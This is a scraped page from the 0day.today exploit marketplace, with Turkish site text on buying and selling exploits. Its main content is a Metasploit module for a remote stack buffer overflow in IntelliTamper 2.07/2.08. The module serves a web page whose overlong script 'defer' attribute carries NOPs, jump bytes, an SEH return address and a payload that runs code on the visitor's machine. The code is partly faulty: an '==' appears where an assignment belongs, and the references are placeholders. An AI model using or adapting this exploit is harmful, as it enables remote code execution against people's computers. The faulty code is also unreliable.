0day.today - Dunyanin En Buyuk Exploit Veritabani
![](/img/logo_green.jpg)
Biz sadece bir adet ana domain kullaniyoruz DOMAIN_LINK
Eger exploit satin alacaksaniz ve ya hizmet icin odeme yapacaksaniz, altin almaniz gerekmekte. Biz sitemizi hack amacli kullanmak istemiyoruz, yani her turlu dogru olmayan, kanunsuz ve illegal yapilan eylemler diger hesaplari olumsuz yonde etkileyebilir ve sonrasinda buna yol acan/lar, web sitelerimize ve verilere erisimi tamamen kesilir, banlanir ve hesabini tarafimizca yok edilir.
Sadece bu sitenin yonetimine itibar edin. Sahtelere Dikkat!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Oku [ anlasma ]
- Oku [ Gonder ] kurallar
- Ziyaret et [ SSS ] page
- [ Uye Ol ] profil
- [ FIYAT ]
- Eger istiyorsaniz [ satmak ]
- Eger istiyorsaniz [ almak ]
- Eger kaybederseniz [ Hesap ]
- Herhangi bir sorunuz [ [email protected] ]
- Yetkili sayfa
- Uyelik sayfasi
- Hesap sayfasini geri yukle
- SSS sayfasi
- Iletisim sayfasi
- Paylasim kurallari
- Anlasma sayfasi
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Bize ulasabilirsiniz:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
IntelliTamper 2.07/2.08 (defer) Remote Buffer Overflow (meta)
Yazar
Risk
![](/img/risk/critlow_0.gif)
Security Risk Unsored
]0day-ID
Kategori
Eklenme Tarihi
Platform
============================================================= IntelliTamper 2.07/2.08 (defer) Remote Buffer Overflow (meta) ============================================================= ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'IntelliTamper 2.07/2.08 (defer) Remote Buffer Overflow ', 'Description' => %q{ This module exploits a stack overflow in the IntelliTamper. By sending an overly long string to the "defer" script, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'Stack, Mountassif Moad' ], 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.exploit-db.com/exploits/11220'], [ 'CVE', '2009-0' ], [ 'OSVDB', '0' ], [ 'BID', '00, 01' ], [ 'EDB', '11220' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 950, 'BadChars' => "\x00\x3C\x01", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'IntelliTamper 2.07/2.08', { 'Offset' => 6236, 'Ret' => 0x0040103b } ], # intellitamper.exe ], 'DisclosureDate' => 'Jan 22 2009', 'DefaultTarget' => 0)) end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Set the exploit buffer sploit == '<html><head><title>loneferret test</title></head><body>' sploit += '<script defer="' sploit += "\x41" * 6236 sploit += make_nops(180) sploit += '\xE9\x55\xFE\xFF\xFF' sploit += '\xeb\xd0\x90\x90' sploit += [target.ret].pack('V') sploit += make_nops(50) sploit += payload.encoded sploit += '">' sploit += '</body></html>' print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, sploit) # Handle the payload handler(cli) end end # 0day.today [2024-07-16] #